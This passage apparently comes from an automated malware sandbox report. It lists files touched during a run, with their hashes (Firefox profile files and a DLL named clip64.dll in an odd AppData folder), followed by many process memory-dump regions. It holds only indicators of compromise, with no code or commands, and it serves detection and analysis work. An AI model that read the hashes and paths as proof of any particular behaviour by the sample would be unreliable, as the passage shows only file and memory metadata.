
                                                          Filesize

                                                          372B

                                                          MD5

                                                          8be33af717bb1b67fbd61c3f4b807e9e

                                                          SHA1

                                                          7cf17656d174d951957ff36810e874a134dd49e0

                                                          SHA256

                                                          e92d3394635edfb987a7528e0ccd24360e07a299078df2a6967ca3aae22fa2dd

                                                          SHA512

                                                          6125f60418e25fee896bf59f5672945cd8f36f03665c721837bb50adf5b4dfef2dddbfcfc817555027dcfa90e1ef2a1e80af1219e8063629ea70263d2fc936a7

                                                        • C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\o97f221x.default-release\gmp-widevinecdm\4.10.2557.0\widevinecdm.dll

                                                          Filesize

                                                          11.8MB

                                                          MD5

                                                          33bf7b0439480effb9fb212efce87b13

                                                          SHA1

                                                          cee50f2745edc6dc291887b6075ca64d716f495a

                                                          SHA256

                                                          8ee42d9258e20bbc5bfdfae61605429beb5421ffeaaa0d02b86d4978f4b4ac4e

                                                          SHA512

                                                          d329a1a1d98e302142f2776de8cc2cd45a465d77cb21c461bdf5ee58c68073a715519f449cb673977288fe18401a0abcce636c85abaec61a4a7a08a16c924275

                                                        • C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\o97f221x.default-release\gmp-widevinecdm\4.10.2557.0\widevinecdm.dll.lib

                                                          Filesize

                                                          1KB

                                                          MD5

                                                          688bed3676d2104e7f17ae1cd2c59404

                                                          SHA1

                                                          952b2cdf783ac72fcb98338723e9afd38d47ad8e

                                                          SHA256

                                                          33899a3ebc22cb8ed8de7bd48c1c29486c0279b06d7ef98241c92aef4e3b9237

                                                          SHA512

                                                          7a0e3791f75c229af79dd302f7d0594279f664886fea228cfe78e24ef185ae63aba809aa1036feb3130066deadc8e78909c277f0a7ed1e3485df3cf2cd329776

                                                        • C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\o97f221x.default-release\gmp-widevinecdm\4.10.2557.0\widevinecdm.dll.sig

                                                          Filesize

                                                          1KB

                                                          MD5

                                                          937326fead5fd401f6cca9118bd9ade9

                                                          SHA1

                                                          4526a57d4ae14ed29b37632c72aef3c408189d91

                                                          SHA256

                                                          68a03f075db104f84afdd8fca45a7e4bff7b55dc1a2a24272b3abe16d8759c81

                                                          SHA512

                                                          b232f6cf3f88adb346281167ac714c4c4c7aac15175087c336911946d12d63d3a3a458e06b298b41a7ec582ef09fe238da3a3166ff89c450117228f7485c22d2

                                                        • C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\o97f221x.default-release\prefs-1.js

                                                          Filesize

                                                          6KB

                                                          MD5

                                                          5cff64f7f1945adee824441fa2539843

                                                          SHA1

                                                          3f55b6dedf361e61a6dbdb913fcd0bf44d5b21e3

                                                          SHA256

                                                          a9803eacf7e8898706a7e2983d98a1685494d6cd7246fd352340f2051f11c2a2

                                                          SHA512

                                                          ba58e0342a6ece29971f93d20aa3856b761a7d7531181fe7b2d890d94c85e3c20cc7e3a773e6fcab0a77e5ba3da3fec10fe12ea75f98a889a02587048930fa9f

                                                        • C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\o97f221x.default-release\prefs-1.js

                                                          Filesize

                                                          7KB

                                                          MD5

                                                          7973d8ffcaf5290dfe8ea806f2307bbd

                                                          SHA1

                                                          ec56b4815acf00fdb24ce59e229761b8acd3a629

                                                          SHA256

                                                          344af02b016a0a019f2aa0e9a0872735a63436c139f5f6eb7a54fa3080d7472e

                                                          SHA512

                                                          1653d911fe3553d16ab189fef0608ed9e0cb32ac46cb1e4085cbf5e576d8e29eabd9f3860247b7a7efff697713e5a0c2830e176fe9aaff5a87a7e550d3fd873d

                                                        • C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\o97f221x.default-release\prefs-1.js

                                                          Filesize

                                                          6KB

                                                          MD5

                                                          1ec630646cf30545a61621f40e599641

                                                          SHA1

                                                          66668b562c3d13504d35a2fd5f3c51252fcf03a0

                                                          SHA256

                                                          1e77f5280042fcd10a7cef558adb35ac796d84e907fcd69d81bffada9cdf884c

                                                          SHA512

                                                          6b0a2940f271264d9f6d6449c43113b9e00c10f2a613bd9840f2e7bcf80476420fa4dfff592b49a3f38a2bbbef38cca6e42e7bdccf2947d958e566b52c1bb3d2

                                                        • C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\o97f221x.default-release\sessionstore-backups\recovery.jsonlz4

                                                          Filesize

                                                          4KB

                                                          MD5

                                                          edc1744ebe12cb09f8f17d68b0254d9c

                                                          SHA1

                                                          75853fbb87916667387c66d74cbcb81c7694f3de

                                                          SHA256

                                                          bf1b2f268558b4c6d4a4667ef37cca8af7af65519f98640200863cf6754bfa58

                                                          SHA512

                                                          ab868fa89d1c500d4fff53170bd947554152445542bf503256cb6dda3fdbe5d2f7a0d089fd947c572ee1690934b7d9bca0d5f82017889e98ca8b45473a696324

                                                        • C:\Users\Admin\AppData\Roaming\c1ec479e5342a2\clip64.dll

                                                          Filesize

                                                          124KB

                                                          MD5

                                                          0d3418372c854ee228b78e16ea7059be

                                                          SHA1

                                                          c0a29d4e74d39308a50f4fd21d0cca1f98cb02c1

                                                          SHA256

                                                          885bf0b3b12b77ef3f953fbb48def1b45079faa2a4d574ee16afdbafa1de3ac7

                                                          SHA512

                                                          e30dced307e04ae664367a998cd1ba36349e99e363f70897b5d90c898de2c69c393182c3afba63a74956b5e6f49f0635468e88ed31dd1e3c86c21e987ddd2c19

                                                        • memory/956-555-0x00000000010E0000-0x0000000001120000-memory.dmp

                                                          Filesize

                                                          256KB

                                                        • memory/956-556-0x00000000002D0000-0x00000000002D6000-memory.dmp

                                                          Filesize

                                                          24KB

                                                        • memory/1284-699-0x0000000077460000-0x0000000077609000-memory.dmp

                                                          Filesize

                                                          1.7MB

                                                        • memory/1284-694-0x0000000000100000-0x000000000010A000-memory.dmp

                                                          Filesize

                                                          40KB

                                                        • memory/1284-698-0x0000000000850000-0x0000000000C50000-memory.dmp

                                                          Filesize

                                                          4.0MB

                                                        • memory/1284-701-0x0000000076EE0000-0x0000000076F27000-memory.dmp

                                                          Filesize

                                                          284KB

                                                        • memory/1532-721-0x00000000001D0000-0x000000000069B000-memory.dmp

                                                          Filesize

                                                          4.8MB

                                                        • memory/1532-736-0x00000000001D0000-0x000000000069B000-memory.dmp

                                                          Filesize

                                                          4.8MB

                                                        • memory/1532-733-0x0000000007050000-0x000000000751B000-memory.dmp

                                                          Filesize

                                                          4.8MB

                                                        • memory/1532-732-0x0000000007050000-0x000000000751B000-memory.dmp

                                                          Filesize

                                                          4.8MB

                                                        • memory/1540-703-0x0000000000400000-0x00000000004BC000-memory.dmp

                                                          Filesize

                                                          752KB

                                                        • memory/1540-627-0x0000000005540000-0x000000000584D000-memory.dmp

                                                          Filesize

                                                          3.1MB

                                                        • memory/1540-684-0x0000000005540000-0x000000000584D000-memory.dmp

                                                          Filesize

                                                          3.1MB

                                                        • memory/1596-777-0x0000000140000000-0x00000001408F6000-memory.dmp

                                                          Filesize

                                                          9.0MB

                                                        • memory/1596-773-0x0000000140000000-0x00000001408F6000-memory.dmp

                                                          Filesize

                                                          9.0MB

                                                        • memory/1596-770-0x0000000140000000-0x00000001408F6000-memory.dmp

                                                          Filesize

                                                          9.0MB

                                                        • memory/1596-749-0x0000000140000000-0x00000001408F6000-memory.dmp

                                                          Filesize

                                                          9.0MB

                                                        • memory/1596-757-0x0000000140000000-0x00000001408F6000-memory.dmp

                                                          Filesize

                                                          9.0MB

                                                        • memory/1596-758-0x0000000140000000-0x00000001408F6000-memory.dmp

                                                          Filesize

                                                          9.0MB

                                                        • memory/1596-774-0x0000000140000000-0x00000001408F6000-memory.dmp

                                                          Filesize

                                                          9.0MB

                                                        • memory/1596-748-0x0000000140000000-0x00000001408F6000-memory.dmp

                                                          Filesize

                                                          9.0MB

                                                        • memory/1596-759-0x0000000140000000-0x00000001408F6000-memory.dmp

                                                          Filesize

                                                          9.0MB

                                                        • memory/1596-760-0x0000000140000000-0x00000001408F6000-memory.dmp

                                                          Filesize

                                                          9.0MB

                                                        • memory/1596-761-0x0000000000130000-0x0000000000150000-memory.dmp

                                                          Filesize

                                                          128KB

                                                        • memory/1596-763-0x0000000140000000-0x00000001408F6000-memory.dmp

                                                          Filesize

                                                          9.0MB

                                                        • memory/1596-746-0x0000000140000000-0x00000001408F6000-memory.dmp

                                                          Filesize

                                                          9.0MB

                                                        • memory/1596-768-0x0000000140000000-0x00000001408F6000-memory.dmp

                                                          Filesize

                                                          9.0MB

                                                        • memory/1596-767-0x0000000140000000-0x00000001408F6000-memory.dmp

                                                          Filesize

                                                          9.0MB

                                                        • memory/1784-628-0x0000000000400000-0x000000000070D000-memory.dmp

                                                          Filesize

                                                          3.1MB

                                                        • memory/1784-705-0x0000000060900000-0x0000000060992000-memory.dmp

                                                          Filesize

                                                          584KB

                                                        • memory/1784-629-0x0000000000400000-0x000000000070D000-memory.dmp

                                                          Filesize

                                                          3.1MB

                                                        • memory/1784-704-0x0000000000400000-0x000000000070D000-memory.dmp

                                                          Filesize

                                                          3.1MB

                                                        • memory/1784-688-0x0000000000400000-0x000000000070D000-memory.dmp

                                                          Filesize

                                                          3.1MB

                                                        • memory/1836-579-0x0000000000C60000-0x0000000001117000-memory.dmp

                                                          Filesize

                                                          4.7MB

                                                        • memory/1836-542-0x0000000000C60000-0x0000000001117000-memory.dmp

                                                          Filesize

                                                          4.7MB

                                                        • memory/1836-778-0x0000000006FB0000-0x000000000747B000-memory.dmp

                                                          Filesize

                                                          4.8MB

                                                        • memory/1836-775-0x0000000000C60000-0x0000000001117000-memory.dmp

                                                          Filesize

                                                          4.7MB

                                                        • memory/1836-687-0x0000000006FD0000-0x0000000007498000-memory.dmp

                                                          Filesize

                                                          4.8MB

                                                        • memory/1836-803-0x0000000006FB0000-0x000000000747B000-memory.dmp

                                                          Filesize

                                                          4.8MB

                                                        • memory/1836-685-0x0000000006FD0000-0x0000000007498000-memory.dmp

                                                          Filesize

                                                          4.8MB

                                                        • memory/1836-731-0x0000000006FD0000-0x0000000007498000-memory.dmp

                                                          Filesize

                                                          4.8MB

                                                        • memory/1836-719-0x0000000006FB0000-0x000000000747B000-memory.dmp

                                                          Filesize

                                                          4.8MB

                                                        • memory/1836-580-0x0000000000C60000-0x0000000001117000-memory.dmp

                                                          Filesize

                                                          4.7MB

                                                        • memory/1836-720-0x0000000006FB0000-0x000000000747B000-memory.dmp

                                                          Filesize

                                                          4.8MB

                                                        • memory/1836-737-0x0000000006FD0000-0x0000000007498000-memory.dmp

                                                          Filesize

                                                          4.8MB

                                                        • memory/1836-670-0x0000000000C60000-0x0000000001117000-memory.dmp

                                                          Filesize

                                                          4.7MB

                                                        • memory/1984-592-0x0000000000400000-0x0000000000414000-memory.dmp

                                                          Filesize

                                                          80KB

                                                        • memory/1984-702-0x0000000000400000-0x0000000000414000-memory.dmp

                                                          Filesize

                                                          80KB

                                                        • memory/2180-527-0x0000000002150000-0x0000000002607000-memory.dmp

                                                          Filesize

                                                          4.7MB

                                                        • memory/2180-543-0x0000000002150000-0x0000000002607000-memory.dmp

                                                          Filesize

                                                          4.7MB

                                                        • memory/2204-541-0x0000000000AF0000-0x0000000000FA7000-memory.dmp

                                                          Filesize

                                                          4.7MB

                                                        • memory/2204-528-0x0000000000AF0000-0x0000000000FA7000-memory.dmp

                                                          Filesize

                                                          4.7MB

                                                        • memory/2648-697-0x0000000001380000-0x0000000001848000-memory.dmp

                                                          Filesize

                                                          4.8MB

                                                        • memory/2648-686-0x0000000001380000-0x0000000001848000-memory.dmp

                                                          Filesize

                                                          4.8MB

                                                        • memory/2648-691-0x0000000077460000-0x0000000077609000-memory.dmp

                                                          Filesize

                                                          1.7MB

                                                        • memory/2648-693-0x0000000076EE0000-0x0000000076F27000-memory.dmp

                                                          Filesize

                                                          284KB

                                                        • memory/2648-690-0x0000000004D50000-0x0000000005150000-memory.dmp

                                                          Filesize

                                                          4.0MB

                                                        • memory/2648-689-0x0000000004D50000-0x0000000005150000-memory.dmp

                                                          Filesize

                                                          4.0MB

                                                        • memory/2740-771-0x000000001B730000-0x000000001BA12000-memory.dmp

                                                          Filesize

                                                          2.9MB

                                                        • memory/2740-772-0x0000000001D30000-0x0000000001D38000-memory.dmp

                                                          Filesize

                                                          32KB

                                                        • memory/2772-957-0x00000000002B0000-0x0000000000511000-memory.dmp

                                                          Filesize

                                                          2.4MB

                                                        • memory/2772-756-0x00000000002B0000-0x0000000000511000-memory.dmp

                                                          Filesize

                                                          2.4MB

                                                        • memory/2848-578-0x0000000002790000-0x0000000002798000-memory.dmp

                                                          Filesize

                                                          32KB

                                                        • memory/2848-577-0x000000001B710000-0x000000001B9F2000-memory.dmp

                                                          Filesize

                                                          2.9MB

                                                        • memory/2880-804-0x0000000000400000-0x0000000000452000-memory.dmp

                                                          Filesize

                                                          328KB

                                                        • memory/2880-806-0x0000000000400000-0x0000000000452000-memory.dmp

                                                          Filesize

                                                          328KB

                                                        • memory/2932-509-0x0000000000370000-0x0000000000A01000-memory.dmp

                                                          Filesize

                                                          6.6MB

                                                        • memory/2932-307-0x0000000000370000-0x0000000000A01000-memory.dmp

                                                          Filesize

                                                          6.6MB

                                                        • memory/2932-1-0x0000000077650000-0x0000000077652000-memory.dmp

                                                          Filesize

                                                          8KB

                                                        • memory/2932-2-0x0000000000371000-0x0000000000388000-memory.dmp

                                                          Filesize

                                                          92KB

                                                        • memory/2932-3-0x0000000000370000-0x0000000000A01000-memory.dmp

                                                          Filesize

                                                          6.6MB

                                                        • memory/2932-530-0x0000000000370000-0x0000000000A01000-memory.dmp

                                                          Filesize

                                                          6.6MB

                                                        • memory/2932-4-0x0000000061E00000-0x0000000061EF3000-memory.dmp

                                                          Filesize

                                                          972KB

                                                        • memory/2932-0-0x0000000000370000-0x0000000000A01000-memory.dmp

                                                          Filesize

                                                          6.6MB

                                                        • memory/2932-246-0x0000000000370000-0x0000000000A01000-memory.dmp

                                                          Filesize

                                                          6.6MB

                                                        • memory/2932-318-0x0000000000370000-0x0000000000A01000-memory.dmp

                                                          Filesize

                                                          6.6MB

                                                        • memory/2940-884-0x0000000000C60000-0x000000000112B000-memory.dmp

                                                          Filesize

                                                          4.8MB

                                                        • memory/2940-734-0x0000000000C60000-0x000000000112B000-memory.dmp

                                                          Filesize

                                                          4.8MB

                                                        • memory/2940-754-0x00000000066E0000-0x0000000006941000-memory.dmp

                                                          Filesize

                                                          2.4MB

                                                        • memory/2940-755-0x00000000066E0000-0x0000000006941000-memory.dmp

                                                          Filesize

                                                          2.4MB

                                                        • memory/3904-1236-0x0000000000E40000-0x00000000010F6000-memory.dmp

                                                          Filesize

                                                          2.7MB

                                                        • memory/3904-1235-0x0000000000E40000-0x00000000010F6000-memory.dmp

                                                          Filesize

                                                          2.7MB